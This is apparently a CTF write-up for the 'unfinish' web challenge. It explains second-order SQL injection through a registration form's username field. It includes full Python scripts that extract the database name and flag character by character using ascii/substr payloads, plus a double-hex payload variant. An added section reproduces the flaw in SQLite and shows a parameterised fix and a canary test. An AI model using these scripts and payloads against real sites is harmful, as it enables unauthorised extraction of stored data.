攻防世界 Web: unfinish

Opening the page shows a login form.
Scanning with 御剑 reveals a registration page.
Capture the registration request with Burp Suite.
Try a blind SQL injection payload: username=1' and left(database(),1)>'a'#
The response is nnnnoooo!!!, so a lot is being filtered.
From the three parameters in the captured request, the registration statement is presumably: insert into tables values('$email','$username','$password');
After a successful login the statement is: SELECT * FROM tables WHERE email = '$email';
Construct the injection payload: 0'+ascii(substr((select database()) from 1 for 1))+'0
But it failed; fuzzing shows that a great deal is filtered here. With no way forward I read other players' writeups, so straight to the scripts that retrieve the database name and the flag.
Retrieve the database name (web):

import re
import requests

session = requests.session()
url = 'http://111.200.241.244:63436/'

def register(email, username):
    # Register with the crafted username; the INSERT evaluates it as SQL
    url1 = url + 'register.php'
    data = dict(email=email, username=username, password='123456')
    html = session.post(url=url1, data=data)
    html.encoding = 'utf-8'
    return html

def login(email):
    # Log in so the page renders whatever value was stored as the username
    url2 = url + 'login.php'
    data = dict(email=email, password='123456')
    html = session.post(url=url2, data=data)
    html.encoding = 'utf-8'
    return html

db = ''
for i in range(1, 10):          # read the database name one character at a time
    payload = "0'+ascii(substr((select database()) from %d for 1))+'0" % i
    email = "111@qq.com" + str(i)   # a fresh account per character
    html = register(email, payload)
    html = login(email)
    match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', html.text)
    if match is None:
        break                   # page did not render a numeric user-name
    asc = match.group(1)
    if asc == '0':
        break                   # past the end of the string
    db = db + chr(int(asc))
print('database:', db)


As for the table name being flag, the other players say it was simply guessed:

import requests
import re

register_url = 'http://111.200.241.244:63436/register.php'
login_url = 'http://111.200.241.244:63436/login.php'

for i in range(1, 100):
    # Each iteration reads the i-th character of the flag row
    register_data = {
        'email': '111@qq.com%d' % i,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': '123456'
    }
    res = requests.post(url=register_url, data=register_data)

    login_data = {
        'email': '111@qq.com%d' % i,
        'password': '123456'
    }
    res_ = requests.post(url=login_url, data=login_data)
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    if code is None or code.group(1) == '0':
        break                   # no numeric user-name rendered, or end of string
    print(chr(int(code.group(1))), end='')
print()

The flag parsed out here has a slight problem, but the part inside the {} braces is correct.

There is another payload that also works, though it needs a script as well; just a brief mention here:
payload: 0'%2B(select hex(hex(database())))%2B'0
Decode the result twice (Python 3 form of the original Python 2 one-liner):

>>> bytes.fromhex(bytes.fromhex("373736353632").decode()).decode()
'web'

flag: 0'%2B(select substr(hex(hex((select * from flag))) from 1 for 10))%2B'0
This yields the first two characters, fl.
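Both techniques above rely on the same defect: the registration INSERT concatenates the username into the SQL text, so a quote closes the literal and the rest is evaluated as an arithmetic expression whose numeric result is what gets stored and later rendered as the user-name. The double hex matters because hex(hex(s)) consists only of decimal digits, so the value survives the numeric coercion that the '0'+...+'0' form forces. The following is an added example, not code from the writeup or the challenge: it reproduces the mechanism on an in-memory SQLite table (schema, column names and the canary username are assumptions), shows the parameterised INSERT that prevents it, and gives a defender's canary test for a registration path. SQLite's unicode() plays the role of MySQL's ascii().

```python
import sqlite3

# Constructed stand-in for the challenge's user table (names assumed).
SCHEMA = "CREATE TABLE users (email TEXT, username TEXT, password TEXT)"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def register_vulnerable(conn, email, username, password):
    # String formatting: a quote in `username` closes the literal and the
    # remainder is parsed as SQL, so the column receives the value the
    # expression evaluates to, not the submitted text.
    conn.execute("INSERT INTO users VALUES ('%s', '%s', '%s')"
                 % (email, username, password))


def register_safe(conn, email, username, password):
    # Parameterised insert: the value travels separately from the SQL text
    # and is stored verbatim whatever characters it contains.
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 (email, username, password))


def stored_username(conn, email):
    # The lookup the login page performs; the rendered user-name is simply
    # whatever ended up in the column.
    row = conn.execute("SELECT username FROM users WHERE email = ?",
                       (email,)).fetchone()
    return None if row is None else str(row[0])


def double_hex(s):
    # hex(hex(s)) as MySQL/SQLite compute it: every byte of hex(s) is a
    # digit or A-F, and hex of those characters is 30-39 or 41-46, so the
    # second pass is decimal digits only and survives '0'+x+'0' coercion.
    once = s.encode().hex().upper()
    twice = once.encode().hex().upper()
    return twice


def decode_double_hex(digits):
    # Reverse of double_hex, the two-step decode shown in the writeup.
    return bytes.fromhex(bytes.fromhex(digits).decode()).decode()


def registration_is_injectable(register_fn):
    # Canary test for a registration path: submit a username that is an
    # arithmetic expression in quote-breaking form and check whether the
    # stored value still equals the submitted text. Assumed canary value.
    conn = new_db()
    canary = "0'+unicode('w')+'0"   # evaluates to 119 if parsed as SQL
    register_fn(conn, "canary@example.test", canary, "pw")
    return stored_username(conn, "canary@example.test") != canary


if __name__ == "__main__":
    print("vulnerable path injectable:", registration_is_injectable(register_vulnerable))
    print("parameterised path injectable:", registration_is_injectable(register_safe))
    print("hex(hex('web')) =", double_hex("web"), "->", decode_double_hex(double_hex("web")))
```

The canary deliberately uses a harmless expression; the only thing the test observes is whether the stored value equals what was submitted, which is exactly the property a registration handler must guarantee.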

For the ascii-based approach and the double hex encoding used here, see the link below:
unfinish

Summary:
SQL injection exploitation using ascii and hex
